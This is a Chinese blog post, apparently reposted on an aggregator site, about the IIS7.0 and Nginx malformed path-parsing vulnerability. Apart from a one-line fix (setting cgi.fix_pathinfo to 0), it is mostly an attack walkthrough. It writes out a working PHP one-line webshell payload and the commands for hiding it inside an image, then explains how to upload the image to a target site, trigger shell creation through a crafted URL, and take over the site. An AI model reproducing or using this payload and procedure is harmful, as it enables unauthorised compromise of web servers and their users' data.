iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
IIS7.0畸形解析0day通殺漏洞,和Nginx上次的0day一樣。使用iis7.0的注意了。臨時解決辦法:關閉cgi.fix_pathinfo為0
Nginx好像又爆0day了,windows下可任意查看和下載腳本文件 王猛 IIS7.0畸形解析0day通殺漏洞,和Nginx上次的0day一樣。使用iis7.0的注意了。
臨時解決辦法:關閉cgi.fix_pathinfo為0
__________________________________
先說一下Nginx那個0day(出來有幾天了,因為介紹的網站很多,所以當時就沒轉載)
先合并一張PHP一句話圖片馬,合并方法:
①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif
②、用edjpgcom,進行圖片和一句話木馬的合并,一句話代碼為"<?fputs (fopen("shell.PHP","w"),"<?eval(\$_POST[akt]);?>")?>"
圖片隨便找一張.
一句話:<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[akt])?>');?>
然后找個nginx的站,先注冊一個用戶然后在論壇上傳一張我們剛剛合并的圖片一句話馬。
找到圖片地址,然后在地址后面加個shell.php,在瀏覽器中運行。
比如假設圖片地址為 www.webshell.cc/tupian/1.jpg
則執行地址為 www.webshell.cc/tupian/1.jpg/shell.php
然后,會在目錄下生成shell.php。比如: www.xxx.com/tupian/shell.php
shell.php就是我們的一句話地址。再拿一句話的客戶端連接這個一句話地址就好。
上面就是Nginx拿站全過程,IIS7.0的畸形解析和這個類似。
找到某個使用IIS7.0架設的站,然后找到其中的圖片上傳點(不需要管理權限,普通注冊用戶即可搞定),把PHP大馬后綴改成.jpg,傳上去,得到圖片地址。
在圖片格式后面添加xx.php xx隨便你怎么填。只要后綴為.php就好。
剩下的就隨便你去搞吧。
轉載請注明來自WebShell'S Blog,本文地址:https://www.webshell.cc/1638.html
總結
以上是生活随笔為你收集整理的iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 给模型加装饰器Java,装饰器设计模式
- 下一篇: 梦里花开如梦是哪首歌啊?